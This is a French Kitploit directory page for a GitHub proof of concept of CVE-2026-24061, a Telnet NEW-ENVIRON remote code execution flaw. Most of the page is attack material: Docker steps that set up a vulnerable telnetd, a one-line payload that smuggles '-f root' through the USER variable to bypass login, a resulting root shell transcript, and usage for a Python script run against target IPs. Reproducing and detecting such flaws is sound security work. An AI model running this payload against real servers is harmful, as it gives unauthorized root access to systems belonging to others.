Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-24061 — Preuve de concept pour CVE-2026-24061, une vulnérabilité RCE Telnet NEW-ENVIRON, avec environnement de reproduction Docker et script de détection Python. | Kitploit
Outils/GitHubGitHub/r00tuser111/cve-2026-24061
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubr00tuser111/cve-2026-24061

CVE-2026-24061

Preuve de concept pour CVE-2026-24061, une vulnérabilité RCE Telnet NEW-ENVIRON, avec environnement de reproduction Docker et script de détection Python.

Voir le dépôt
6il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-24061

Étapes de reproduction

Construire l'image

root@kitploit:~
docker build -t telnetd-bypass .

Lancer le conteneur

root@kitploit:~
docker run -it --rm \
  --name telnetd-vuln \
  --privileged \
  -p 23:23 \
  telnetd-bypass

Envoyer le payload

root@kitploit:~
USER='-f root' telnet -a 127.0.0.1 23

Résultat

root@kitploit:~
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

Linux 6.10.14-linuxkit (c910afb30330) (pts/1)

Linux c910afb30330 6.10.14-linuxkit #1 SMP Tue Oct 14 07:32:13 UTC 2025 aarch64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jan 22 05:55:47 UTC 2026 from 172.64.155.119 on pts/1
root@c910afb30330:~#

Script de reproduction :

python3 poc.py -h

root@kitploit:~
usage: poc.py [-h] -t TARGET [-p PORT]

CVE-2026-24061 Telnet NEW-ENVIRON RCE 漏洞检测工具

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        目标 IP 地址
  -p PORT, --port PORT  目标端口 (默认: 23)

示例:
  poc.py -t 192.168.1.100 -p 23
  poc.py --target 127.0.0.1 --port 23

Liens de référence :

  • https://www.openwall.com/lists/oss-security/2026/01/20/2
  • https://mp.weixin.qq.com/s/PA5EhntsCyWfQT2kTE1yNA
Télécharger l’outil